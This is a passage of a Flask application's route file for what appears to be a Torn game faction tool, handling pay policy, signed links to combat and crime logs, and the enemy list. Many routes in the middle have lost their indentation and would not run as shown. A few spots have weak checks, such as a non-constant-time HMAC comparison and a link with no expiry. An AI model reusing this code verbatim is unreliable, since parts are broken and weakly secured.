        if form.validate_on_submit():
            try:
                cn = request.form['cn']
                percent = request.form['percent']
            except:
                app.logger.info('error involving OCpolicyForm')
                return render_template('message.html', title='change to pay policy', message='OCpolicyForm exception reading input', logged_in=True)
        else:
            app.logger.info('OCpolicyForm fails validation')
            return render_template('message.html', title='change to pay policy', message='OCpolicyForm failed validation', logged_in=True)
        try:
            # cache the change in the ORM; sqlite is updated elsewhere
            policy_update = Ocpolicy(faction=int(faction_sum['fid']), timestamp=int(time.time()), percent=percent, username=current_user.username, octype=cn)
            db.session.add(policy_update)
            db.session.commit()
        except:
            app.logger.info('error inserting ino Ocpolicy ORM')
            return render_template('message.html', title='change to pay policy', message='Change of pay policy failed to update DB.', logged_in=True)
        return redirect('/rhubarb/pay_policy')
    # - - - - - - - POST section
    # read policy from sqlite
    read_policy = rodb.get_oc_payment_policy(faction_sum['fid'])
    policy = {} # mutable to produce human-readable times
    for k in sorted(read_policy.keys()):
        et = read_policy[k][0]
        policy[k] = list(read_policy[k])
        policy[k][0] = time.strftime("%Y-%m-%d %H:%M",time.gmtime(et))
        # field 3 looks like the setter's player id; show the name when known
        if str(read_policy[k][3]) in rodb.pid2n:
            policy[k][3] = rodb.pid2n[ str(read_policy[k][3]) ]
    # check the orm for a cached alteration to the figures from sqlite
    pending = 0
    want_policy_change = Ocpolicy.query.filter_by(faction = faction_sum['fid']).all()
    for pol_item in want_policy_change:
        if pol_item.octype not in policy:
            pending=1
            break
        if float(pol_item.percent) != float(policy[pol_item.octype][2]):
            pending=1
            break
    return render_template('pay_policy.html', title='Pay Policy', u=current_user.username, is_leader=is_leader, policy=policy, oc_num2title=oc_num2title, pending=pending, form=form)
#=================================================================================
@app.route('/faction_player_table')
@login_required
def faction_player_table():
    """Leader-only table of the viewer's faction members."""
    if current_user.must_change_pw:
        return redirect('/rhubarb/change_pw')
    uid = current_user.username
    reader = read_sqlite.Rodb()
    summary = reader.get_faction_for_player(uid)
    member = reader.get_player_data(uid)
    leader = bool_leader(int(uid), summary['fid'])
    if not leader:
        # non-leaders get a denial message instead of the table
        return render_template('message.html', title='Faction Player Table Denied', u=uid, player=member, message='No access to player table!', logged_in=True)
    # reuse the faction summary we already fetched to build the member table
    table = reader.get_player_table(summary)
    return render_template('faction_player_table.html', title='Faction Player Table', u=uid, player=member, faction_sum=summary, is_leader=leader, pt=table)
#=================================================================================
@app.route('/home')
@login_required
def home():
    """Player landing page: faction summary, leadership record, payments due.

    The leadership record is reconstructed from the most recent Extra_leaders
    row (promotions/demotions) for this player in this faction.
    """
    if current_user.must_change_pw:
        return redirect('/rhubarb/change_pw')
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    player = rodb.get_player_data(current_user.username)
    is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
    f_id = faction_sum['fid']
    p_id = int(current_user.username)
    # what do we know about this player being a leader?
    maybe_leader = Extra_leaders.query.filter_by(faction_id = int(faction_sum['fid'])).filter_by(player_id = int(current_user.username)).all()
    leader_entry = False
    et = 0
    set_by = None
    any_data = False
    # keep only the newest promotion/demotion row (largest et wins)
    for ml in maybe_leader:
        if ml.et > et:
            any_data = True
            et = ml.et
            set_by = ml.set_by
            leader_entry = True if ml.is_leader else False
    if any_data:
        # NOTE(review): assumes set_by is always present in pid2n — a missing
        # key here would raise KeyError; confirm against data feed.
        leader_record = [any_data, leader_entry, time.strftime("%Y-%m-%d %H:%M",time.gmtime(et)), rodb.pid2n[str(set_by)]]
    else:
        leader_record = [any_data, False, 'never', '']
    payment_due = []
    if is_leader:
        # leaders also see which OC payouts are still outstanding
        payment_due = rodb.oc_payment_check(faction_sum['fid'])
    return render_template('home.html', title='home', u=current_user.username,
                           player=player, faction_sum=faction_sum, is_leader=is_leader,
                           leader_record=leader_record, payment_due=payment_due)
#=================================================================================
@app.route("/rhubarb/graph/<what_graph>", methods=['GET'])
@app.route("/graph/<what_graph>", methods=['GET'])
def jsgraph(what_graph):
p_id = None
graph_type = None
timestamp = None
given_hmac = None
df = None
right_now = int(time.time())
# what graph is this meant to produce?
re_object = token.match(what_graph)
if re_object:
p_id = re_object.group(1)
graph_type = re_object.group(2)
timestamp = re_object.group(3)
given_hmac = re_object.group(4)
else:
app.logger.info('in jsgraph RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
if 'crime' == graph_type:
graph_selection = ( str(p_id) + 'crime' + str(timestamp) ).encode("utf-8")
elif 'drug' == graph_type:
graph_selection = ( str(p_id) + 'drug' + str(timestamp) ).encode("utf-8")
else:
return render_template("bad_graph_request.html")
hmac_hex = hmac.new(hmac_key, graph_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
app.logger.info('in jsgraph HMAC disagreement')
return render_template("bad_graph_request.html")
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
app.logger.info('in jsgraph timestamp is old')
return render_template("bad_graph_request.html")
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
if 'crime' == graph_type:
parm = (int(p_id),)
df = pd.read_sql_query("select et,selling_illegal_products,theft,auto_theft,drug_deals,computer_crimes,murder,fraud_crimes,other,total from playercrimes where player_id=? order by et", conn, params=parm)
elif 'drug' == graph_type:
parm = (int(p_id),)
df = pd.read_sql_query("select et,cantaken,exttaken,lsdtaken,opitaken,shrtaken,pcptaken,xantaken,victaken,spetaken,kettaken from drugs where player_id=? order by et", conn, params=parm)
else:
conn.close()
return render_template("bad_graph_request.html")
conn.close()
# Does df contain reasonable data? TODO
# convert et to date-as-string so it can be parsed in JS
df['et'] = pd.to_datetime(df['et'],unit='s').astype(str)
chart_data = df.to_dict(orient='records')
data = {'chart_data': chart_data}
if 'crime' == graph_type:
return render_template("playercrimes.html", data=data)
elif 'drug' == graph_type:
return render_template("drug.html", data=data)
else:
return render_template("bad_graph_request.html")
#=================================================================================
@app.route("/rhubarb/faction_oc_history/<tid_cn_t>", methods=['GET','POST'])
@app.route("/faction_oc_history/<tid_cn_t>", methods=['GET','POST'])
@login_required
def faction_oc_history(tid_cn_t):
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
# fid, cn, history-or-et
percent_to_pay = 0
cu = current_user.username
logged_in = True
tid = None
cn = None
timestamp = None
history_column = None
hmac_given = None
re_object = oc_history_picker.match(tid_cn_t)
if re_object:
tid = re_object.group(1)
cn = re_object.group(2)
timestamp = re_object.group(3)
history_column = re_object.group(4)
hmac_given = re_object.group(5)
else:
return render_template('message.html', message='failed to discover the history intended by this click', logged_in=logged_in)
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
player = rodb.get_player_data(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
# check time and hmac
right_now = int(time.time())
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='link expired; cannot use it', logged_in=logged_in)
# either show all the data (up to the last year) or just a recent extract
long_search = False
if history_column == 'history':
long_search = True
flask_parm = (str(tid) + '-' + str(cn) + '-' + str(timestamp) + '-history' ).encode("utf-8")
else:
flask_parm = (str(tid) + '-' + str(cn) + '-' + str(timestamp)).encode("utf-8")
# read the payment policy of this faction (e.g. pay 20% of PA winnings to each player)
oc_percentages = rodb.get_oc_payment_policy(tid)
if int(cn) in oc_percentages:
percent_to_pay = oc_percentages[int(cn)][2]
hmac_hex_hist = hmac.new(hmac_key, flask_parm, digestmod=hashlib.sha1).hexdigest()
if not hmac_hex_hist == hmac_given:
return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
form = PaymentForm()
# - - - - - - - POST section
if request.method == 'POST':
if not is_leader:
return redirect('/rhubarb/logout')
if form.validate_on_submit():
try:
form_faction = request.form['faction_id']
ocp = request.form['oc_plan_id']
except:
app.logger.info('error involving paymentform')
return redirect('/rhubarb/faction_ov')
else:
app.logger.info('paymentform fails validation')
return redirect('/rhubarb/faction_ov')
# write to ORM payment for (form_faction,ocp) by current user at now
new_pay_id=int(random.random() * 1000000000)
pay = Payment_cache(id=new_pay_id, faction_id=int(tid), oc_plan_id=int(ocp), timestamp=int(time.time()), paid_by=int(cu))
db.session.add(pay)
db.session.commit()
return redirect('/rhubarb/faction_oc_history/' + tid_cn_t)
# - - - - - - - POST section
player = {'name':'no name'}
if int(cn):
try:
faction_sum = rodb.get_faction_for_player(current_user.username)
if not faction_sum['fid'] == int(tid):
# viewing from outside faction
return render_template('message.html', message='organised crime data - need to be logged in and in the faction to see that', logged_in=logged_in)
except:
# viewing from outside faction
return render_template('message.html', message='organised crime data - need to be logged in and in the faction to see that', logged_in=logged_in)
else:
# This is a player request and not a faction request - indicated by crime number 0.
# no need to authenticate the user but we do want the name
player = rodb.get_player_data(tid)
# This is the file with Payment_cache defined. Read ORM here and pass details to rodb.get_oc()
payment_query = db.session.query(Payment_cache).filter(Payment_cache.faction_id == tid)
want_payment = payment_query.all()
cached_payments = {}
for cached in want_payment:
cached_payments[cached.oc_plan_id] = {'paid_at':cached.timestamp, 'paid_by':cached.paid_by}
try:
octable, future = rodb.get_oc(tid, cn, long_search, cached_payments) # "tid" might be fid or pid
except:
# example data
octable = [[ 'Today', 8, 'failed to fetch octable', {'4':'Duke', '317178':'Flex'} , {'money':100, 'respect':5, 'delay':1800}, {'paid_by':0, 'paid_at':0}, 1234 ],
[ 'Yesterday', 8, 'failed to fetch octable', {'1455847':'Para'} , {'result':'FAIL', 'delay':60}, {'paid_by':0, 'paid_at':0}, 2345 ]]
return render_template("completed_oc.html", form=form, cn=int(cn), player_name=player['name'], cu=cu, octable=octable, make_links=True if int(tid) >0 else False, percent_to_pay=percent_to_pay)
#=================================================================================
@app.route("/armory_index", methods=['GET'])
@login_required
def armory_index():
if current_user.must_change_pw:
return redirect('/rhubarb/change_pw')
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
player = rodb.get_player_data(current_user.username)
is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
if not is_leader:
return render_template('message.html', title='Denied', u=current_user.username, player=player, message='No access to armorynews!', logged_in=True)
f_id = faction_sum['fid']
players = {}
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
c.execute("select player_id,neumune,empty_blood,morphine,full_blood,first_aid,small_first_aid,bottle_beer,xanax,energy_refill from factionconsumption where faction_id=?", (f_id,))
for row in c:
p = row[0]
# Not as nice as Perl - am I missing a Python trick here?
if not p in players:
players[p] = {}
players[p]['neumune'] = row[1]
players[p]['empty_blood'] = row[2]
players[p]['morphine'] = row[3]
players[p]['full_blood'] = row[4]
players[p]['first_aid'] = row[5]
players[p]['small_first_aid'] = row[6]
players[p]['bottle_beer'] = row[7]
players[p]['xanax'] = row[8]
players[p]['energy_refill'] = row[9]
else:
players[p]['neumune'] += row[1]
players[p]['empty_blood'] += row[2]
players[p]['morphine'] += row[3]
players[p]['full_blood'] += row[4]
players[p]['first_aid'] += row[5]
players[p]['small_first_aid'] += row[6]
players[p]['bottle_beer'] += row[7]
players[p]['xanax'] += row[8]
players[p]['energy_refill'] += row[9]
c.close()
conn.close()
right_now = int(time.time())
for p in players.keys():
players[p]['name'] = rodb.pid2namepid(p)
display_selection = (str(p) + '-' + str(right_now) ).encode("utf-8")
players[p]['url'] = '/rhubarb/armorynews/' + str(p) + '-' + str(right_now) + '-' + hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
return render_template("faction_stuff_used.html", players=players)
#=================================================================================
@app.route("/rhubarb/armorynews/<player_t>", methods=['GET'])
@app.route("/armorynews/<player_t>", methods=['GET'])
@login_required
def armorynews(player_t):
p_id = None
timestamp = None
given_hmac = None
right_now = int(time.time())
re_object = armory_token.match(player_t)
if re_object:
p_id = re_object.group(1)
timestamp = re_object.group(2)
given_hmac = re_object.group(3)
else:
app.logger.info('in armorynews RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(p_id) + '-' + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=True)
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=True)
# need to know faction of the player viewing this page
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = faction_sum['fid']
player = rodb.get_player_data(p_id)
stuff_used = []
parm = (int(p_id), int(f_id),)
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
c.execute("select et,words from factionconsumption where player_id=? and faction_id=? order by et desc", parm)
for row in c:
printable_time = time.strftime("%Y-%m-%d %H:%M",time.gmtime(row[0]))
stuff_used.append([printable_time, row[1]])
c.close()
conn.close()
return render_template("stuff_used.html", player_name=player['name'], stuff_used=stuff_used)
#=================================================================================
@app.route("/chain_bonus/<faction_player_t>", methods=['GET'])
@app.route("/rhubarb/chain_bonus/<faction_player_t>", methods=['GET'])
def chain_bonus(faction_player_t):
f_id = None
p_id = None
timestamp = None
given_hmac = None
right_now = int(time.time())
logged_in = False
try:
u = current_user.username
logged_in = True
except:
pass
re_object = bonus_token.match(faction_player_t)
if re_object:
f_id = re_object.group(1)
p_id = re_object.group(2)
timestamp = re_object.group(3)
given_hmac = re_object.group(4)
else:
app.logger.info('in chain_bonus RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(f_id) + '-' + str(p_id) + 'bonus' + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=logged_in)
# Need to show details of the player we are enquring about, which might not be the current player viewing it.
tbefore = int(time.time()) - 3600 # an hour ago
parm = (int(f_id), int(p_id), tbefore,)
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
bonus_list = []
c.execute("select et,att_name,att_id,verb,def_name,def_id,respect from long_term_bonus where fid=? and att_id=? and et<? order by et desc", parm)
for row in c:
record = list(row)
record[0] = (time.strftime("%Y-%m-%d", time.gmtime(record[0])))
bonus_list.append(record)
c.execute("select name from namelevel where player_id=?", (int(p_id),))
name = '?'
for row in c:
name = row[0]
c.close()
conn.close()
rodb = read_sqlite.Rodb()
faction_name = rodb.get_faction_name(f_id)
return render_template("chain_bonus.html", faction_id=f_id, faction_name=faction_name, player={'name':name, 'pid':p_id, 'chain_bonus_list':bonus_list})
#=================================================================================
@app.route("/defend_summary/<faction_player_role_t>", methods=['GET'])
@app.route("/rhubarb/defend_summary/<faction_player_role_t>", methods=['GET'])
def defend_summary(faction_player_role_t):
f_id = None
p_id = None
role = None
timestamp = None
given_hmac = None
df = None
right_now = int(time.time())
logged_in = False
try:
u = current_user.username
logged_in = True
except:
pass
# what page is this meant to produce, attack or defend?
re_object = combat_token.match(faction_player_role_t)
if re_object:
f_id = re_object.group(1)
p_id = re_object.group(2)
role = re_object.group(3)
timestamp = re_object.group(4)
given_hmac = re_object.group(5)
else:
app.logger.info('in defend_summary RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(f_id) + '-' + str(p_id) + role + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
# test for acceptable timestamp
if ((int(timestamp) + (86400 * 7)) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=logged_in)
# no time limit on defends other than the 28 days of storage
parm = (int(f_id), int(p_id),)
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
if 'defsum' == role: # only allowed role
c.execute("select count(att_id) as num,att_name,att_id,def_name,def_id from combat_events where fid=? and def_id=? and outcome like '%lost' group by att_id order by att_id", parm)
else:
c.close()
conn.close()
return render_template("bad_graph_request.html")
defend_lines = []
safe_text = dehtml.Dehtml()
for row in c:
defend_lines.append(row)
c.close()
conn.close()
return render_template("defend_summary.html", dl=defend_lines)
#=================================================================================
@app.route("/faction_attack/<faction_player_role_t>", methods=['GET'])
@app.route("/rhubarb/faction_attack/<faction_player_role_t>", methods=['GET'])
def combat_events(faction_player_role_t):
f_id = None
p_id = None
role = None
timestamp = None
given_hmac = None
df = None
right_now = int(time.time())
logged_in = False
try:
u = current_user.username
logged_in = True
except:
pass
# what page is this meant to produce, attack or defend?
re_object = combat_token.match(faction_player_role_t)
if re_object:
f_id = re_object.group(1)
p_id = re_object.group(2)
role = re_object.group(3)
timestamp = re_object.group(4)
given_hmac = re_object.group(5)
else:
app.logger.info('in combat_events RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(f_id) + '-' + str(p_id) + role + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=logged_in)
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=logged_in)
tbefore = int(time.time()) - 3600 # an hour ago
parm = (int(f_id), int(p_id), tbefore,)
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
if 'attack' == role:
c.execute("select et,att_name,att_id,verb,def_name,def_id,outcome from combat_events where fid=? and att_id=? and et<? order by et desc", parm)
elif 'defend' == role:
c.execute("select et,att_name,att_id,verb,def_name,def_id,outcome from combat_events where fid=? and def_id=? and et<? order by et desc", parm)
else:
c.close()
conn.close()
return render_template("bad_graph_request.html")
att_count = 0
items = []
old_et = 0
old_att_id = 0
old_def_id = 0
safe_text = dehtml.Dehtml()
for i in c:
et = i[0]
if (old_et == et) and (old_att_id == i[2]) and (old_def_id == i[5]):
continue
iso_time = datetime.datetime.utcfromtimestamp(et).isoformat()
items.append( { 'et': iso_time, 'att_name': safe_text.html_clean(i[1]), 'att_id': i[2], 'verb': i[3], 'def_name': safe_text.html_clean(i[4]), 'def_id': i[5], 'outcome': safe_text.html_clean(i[6])} )
att_count += 1
old_et = et
old_att_id = i[2]
old_def_id = i[5]
if 'attack' == role:
player_name = i[1]
else:
player_name = i[4]
c.close()
conn.close()
if att_count:
return render_template("combat_events.html", data=items, role=role, player_name=player_name)
return render_template("combat_none.html", role=role, player_id=p_id)
#=================================================================================
@app.route("/rhubarb/enemy_watch", methods=['GET','POST'])
@app.route("/enemy_watch", methods=['GET','POST'])
@login_required
def enemy_watch():
form = EnemyForm()
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = int(faction_sum['fid'])
# if form.validate_on_submit():
if request.method == 'POST':
try:
enemy = request.form['enemy']
time_id = request.form['timerange_id']
except:
app.logger.info('error reading from enemy form')
return render_template('message.html', message='something wrong with enemy selection', logged_in=True)
# get enemy and time details from ORM
wantenemy = Enemy.query.filter_by(id = enemy).first()
if not wantenemy:
# unknown enemy id in postgres
return render_template('message.html', message='enemy selection not recognised', logged_in=True)
if not wantenemy.f_id == f_id:
return render_template('message.html', message='enemy selection looks invalid for this faction', logged_in=True)
wanttime = Timerange.query.filter_by(id = time_id).first()
if not wanttime:
# unknown time id in postgres
return render_template('message.html', message='timerange selection not recognised', logged_in=True)
if not wanttime.f_id == f_id:
return render_template('message.html', message='timerange selection looks invalid for this faction', logged_in=True)
# link to next page (with HMAC)
selector = str(wantenemy.tornid) + '-' + str(wanttime.id) + '-' + str(int(time.time()))
hmac_hex = hmac.new(hmac_key, selector.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
return redirect('/rhubarb/enemy_log/' + selector + '-' + hmac_hex)
# show form before submission
form.enemy.choices = [(e.id, e.username + '[' + e.tornid + ']') for e in Enemy.query.filter_by(f_id = f_id).all()]
form.timerange_id.choices = [(t.id, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tstart)) + ' to ' + time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tend))) for t in Timerange.query.filter_by(f_id = f_id).all()]
return render_template('enemy_watch.html', title='Enemy Watch', form=form, now=int(time.time()))
#=================================================================================
@app.route("/rhubarb/enemy_watch_faction", methods=['GET','POST'])
@app.route("/enemy_watch_faction", methods=['GET','POST'])
@login_required
def enemy_watch_faction():
form = EnemyForm()
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = int(faction_sum['fid'])
# if form.validate_on_submit():
if request.method == 'POST':
try:
enemy = request.form['enemy']
time_id = request.form['timerange_id']
except:
app.logger.info('error reading from enemy form')
return render_template('message.html', message='something wrong with enemy selection', logged_in=True)
wanttime = Timerange.query.filter_by(id = time_id).first()
if not wanttime:
# unknown time id in postgres
return render_template('message.html', message='timerange selection not recognised', logged_in=True)
if not wanttime.f_id == f_id:
return render_template('message.html', message='timerange selection looks invalid for this faction', logged_in=True)
# get details of taget faction
enemy_factions = {} # count of attacks by us on other factions
all_enemy_faction_attacks = rodb.get_targeted_chain(f_id, enemy, wanttime.tstart, wanttime.tend) # specific faction, specific time
player_items = []
total = 0
for apid in all_enemy_faction_attacks:
# XXX not needed ? # link to next pages (with HMAC)
# selector = str(apid) + '-' + str(enemy) + '-' + str(wanttime.id) + '-' + str(int(time.time()))
# hmac_hex = hmac.new(hmac_key, selector.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
player_items.append( [all_enemy_faction_attacks[apid][2], all_enemy_faction_attacks[apid][1], all_enemy_faction_attacks[apid][0]] )
total += all_enemy_faction_attacks[apid][2]
return render_template('enemy_watch_faction2.html', player_items=player_items, enemy_faction_name=rodb.get_faction_name(enemy), total=total)
# show form before submission
enemy_factions = {} # count of attacks by us on other factions
all_enemy_faction_attacks = rodb.get_targeted_chain(f_id, None, 0, 2100000000) # not specific to faction, all time
for x in all_enemy_faction_attacks.keys():
# only bother with worthwhile numbers
if x:
if all_enemy_faction_attacks[x] >= 50:
enemy_factions[x] = all_enemy_faction_attacks[x]
sorted_ef = sorted(enemy_factions.items(), key=lambda kv: kv[1], reverse=True)
enemy_factions_counted = list(sorted_ef)
form.enemy.choices = [(ek[0], rodb.get_faction_name(ek[0]) + '[' + str(ek[0]) + ']') for ek in enemy_factions_counted]
form.timerange_id.choices = [(t.id, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tstart)) + ' to ' + time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(t.tend))) for t in Timerange.query.filter_by(f_id = f_id).all()]
return render_template('enemy_watch_faction.html', title='Enemy Watch Faction', form=form, enemy_factions_counted=enemy_factions_counted, now=int(time.time()))
#=================================================================================
@app.route("/enemy_log/<player_t_t_hmac>", methods=['GET'])
@app.route("/rhubarb/enemy_log/<player_t_t_hmac>", methods=['GET'])
@login_required
def enemy_log(player_t_t_hmac):
# display summary for that enemy and time range
# with links to times and outcomes
p_id = None
time_id = None
timestamp = None
given_hmac = None
right_now = int(time.time())
re_object = enemy_token.match(player_t_t_hmac)
if re_object:
p_id = re_object.group(1)
time_id = re_object.group(2)
timestamp = re_object.group(3)
given_hmac = re_object.group(4)
else:
app.logger.info('in enemy_log RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = (str(p_id) + '-' + str(time_id) + '-' + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, display_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=True)
# test for acceptable timestamp
if ((int(timestamp) + 86400) < right_now):
return render_template('message.html', message='too old; link has expired', logged_in=True)
# need to know faction of the player viewing this page
rodb = read_sqlite.Rodb()
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = faction_sum['fid']
enemy = Enemy.query.filter_by(tornid = p_id).first()
if not enemy:
return render_template('message.html', message='enemy not recognised in enemy_log', logged_in=True)
wanttime = Timerange.query.filter_by(id = time_id).first()
if not wanttime:
# unknown time id in postgres
return render_template('message.html', message='timerange not recognised in enemy_log', logged_in=True)
if not wanttime.f_id == f_id:
return render_template('message.html', message='timerange selection looks invalid for this faction in enemy_log', logged_in=True)
tstart = wanttime.tstart
tend = wanttime.tend
if tend > right_now - 3600:
tend = right_now - 3600 # do not display events within the last hour
attacks = rodb.get_attacks_on_target(faction_sum['fid'], p_id, tstart, tend)
deco_attacks = []
for d in attacks:
name = str(d[1]) + '[' + str(d[2]) + ']'
display_selection = str(p_id) + '-' + str(d[2])+ '-' + str(tstart) + '-' + str(tend)
hmac_hex = hmac.new(hmac_key, display_selection.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
link = '/rhubarb/target_log/' + display_selection + '-' + hmac_hex
deco_attacks.append([d[0], name, link])
return render_template("enemy_log.html", faction_sum=faction_sum, attacks=deco_attacks, target=str(enemy.username) + '[' + str(p_id) + ']')
#=================================================================================
@app.route("/target_log/<defid_attid_tstart_tend_hmac>", methods=['GET'])
@app.route("/rhubarb/target_log/<defid_attid_tstart_tend_hmac>", methods=['GET'])
def target_log(defid_attid_tstart_tend_hmac):
# defails of attacks on a specific target by a specific player
defid = None
attid = None
tstart = None
tend = None
given_hmac = None
right_now = int(time.time())
re_object = target_token.match(defid_attid_tstart_tend_hmac)
if re_object:
defid = re_object.group(1)
attid = re_object.group(2)
tstart = re_object.group(3)
tend = re_object.group(4)
given_hmac = re_object.group(5)
else:
app.logger.info('in target_log RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
display_selection = str(defid) + '-' + str(attid)+ '-' + str(tstart) + '-' + str(tend)
hmac_hex = hmac.new(hmac_key, display_selection.encode("utf-8"), digestmod=hashlib.sha1).hexdigest()
# test for correct hmac
if not hmac.compare_digest(hmac_hex, given_hmac):
return render_template('message.html', message='link has been altered; cannot use it', logged_in=True)
# from here it's similar to combat_events and uses the same template
role='attack'
conn = sqlite3.connect('file:/var/torn/readonly_db?mode=ro', uri=True)
c = conn.cursor()
c.execute("select et,att_name,att_id,verb,def_name,def_id,outcome from combat_events where def_id = ? and att_id=? and et>? and et<? order by et desc", (defid,attid,tstart,tend,))
items = []
old_et = 0
old_att_id = 0
old_def_id = 0
safe_text = dehtml.Dehtml()
for i in c:
et = i[0]
if (old_et == et) and (old_att_id == i[2]) and (old_def_id == i[5]):
continue
iso_time = datetime.datetime.utcfromtimestamp(et).isoformat()
items.append( { 'et': iso_time, 'att_name': safe_text.html_clean(i[1]), 'att_id': i[2], 'verb': i[3], 'def_name': safe_text.html_clean(i[4]), 'def_id': i[5], 'outcome': safe_text.html_clean(i[6])} )
old_et = et
old_att_id = i[2]
old_def_id = i[5]
player_name = i[1]
c.close()
conn.close()
return render_template("combat_events.html", data=items, role=role, player_name=player_name)
#=================================================================================
@app.route("/delete_faction_enemies/", methods=['GET','POST'])
@app.route("/rhubarb/delete_faction_enemies/", methods=['GET','POST'])
@login_required
def delete_faction_enemies():
    """Let a faction leader remove an entry from the faction's enemy list.

    GET renders a selection form; POST deletes the chosen enemy row and
    redirects to the enemy watch page.  Non-leaders are bounced home.
    """
    form = DeleteEnemyForm()
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    f_id = int(faction_sum['fid'])
    is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
    if not is_leader:
        return redirect('/rhubarb/home')
    # read enemies from ORM - BEFORE the POST section otherwise form choices won't be ready
    baddies = {}
    want_enemy = Enemy.query.filter_by(f_id = faction_sum['fid']).all()
    for enemy in want_enemy:
        baddies[enemy.tornid] = enemy.username
    # choice value is the torn id as int; label is "name[id]" (tornid keys are strings)
    form.de_id.choices = [( int(k), baddies[k] + '[' + k + ']') for k in sorted(baddies.keys())]
    # - - - - - - - POST section
    if request.method == 'POST':
        if form.validate_on_submit():
            try:
                de_id = request.form['de_id']
            except:
                app.logger.info('error involving DeleteEnemyForm')
                return render_template('message.html', title='delete enemy', message='DeleteEnemyForm exception reading input', logged_in=True)
        else:
            app.logger.info('DeleteEnemyForm fails validation')
            return render_template('message.html', title='delete enemy', message='DeleteEnemyForm failed validation: ' + str(request.form), form=form , logged_in=True)
        if de_id:
            # only delete rows belonging to this leader's own faction
            wantenemy = Enemy.query.filter_by(tornid = de_id).filter_by(f_id = faction_sum['fid']).first()
            if wantenemy:
                db.session.delete(wantenemy)
                db.session.commit()
        return redirect('/rhubarb/enemy_watch')
    # - - - - - - - POST section
    faction_name = rodb.get_faction_name(f_id)
    return render_template('delete_faction_enemies.html', title='Enemies', form=form, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/add_faction_enemies/", methods=['GET','POST'])
@app.route("/rhubarb/add_faction_enemies/", methods=['GET','POST'])
@login_required
def add_faction_enemies():
    """Let a faction leader add a torn id to the faction's enemy list.

    GET renders the form; POST validates the id and inserts a new Enemy
    row (username is filled in later by another program).
    """
    form = AddEnemyForm()
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(current_user.username)
    f_id = int(faction_sum['fid'])
    is_leader = bool_leader(int(current_user.username), faction_sum['fid'])
    if not is_leader:
        return redirect('/rhubarb/home')
    # - - - - - - - POST section
    if request.method == 'POST':
        if form.validate_on_submit():
            try:
                add_id = request.form['add_id']
